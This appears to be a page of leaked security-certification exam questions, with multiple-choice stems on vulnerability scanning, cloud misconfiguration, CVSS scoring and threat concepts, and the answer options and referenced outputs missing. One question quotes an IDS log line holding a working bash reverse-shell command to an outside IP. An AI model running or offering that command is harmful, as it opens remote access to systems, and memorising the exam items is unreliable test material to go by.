A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?
A security analyst identified the following suspicious entry on the host -based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources? Exam Dum ps 137 /298
A company has the following security requirements: . No public IPs · All data secured at rest . No insecure ports/protocols After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output: Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?
A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero -day threat?
